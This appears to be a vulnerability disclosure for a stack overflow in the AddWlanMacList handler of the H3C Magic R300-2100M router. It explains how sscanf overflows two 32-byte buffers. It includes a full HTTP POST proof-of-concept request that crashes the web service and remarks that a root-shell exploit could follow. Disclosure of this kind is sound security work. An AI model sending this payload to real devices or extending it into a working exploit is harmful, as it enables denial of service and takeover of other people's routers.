H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm

# H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm ###### tags: `H3C` `Magic R300-2100M` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm. ## Vulnerability Details ![](https://hackmd.io/_uploads/ry9T-do4n.png) In the AddWlanMacList function, local variable v5 and v6 are both 32 bytes long. ![](https://hackmd.io/_uploads/rkfRZui4n.png) V3 can be controlled by attacker, entered as parameter 'param'. In line 30, v3 is formatted into v5,v6 by function sscanf. So when the size of the data we enter between the first and second ';'(or the second and the third) is larger than 32 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC ![](https://i.imgur.com/PpMbygV.png) ![](https://hackmd.io/_uploads/rJxnzOj4h.png) ``` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG= Connection: close Content-Length: 608 CMD=AddWlanMacList&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; ``` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. ![](https://hackmd.io/_uploads/ryypGuiEn.png) And you can write your own exp to get the root shell.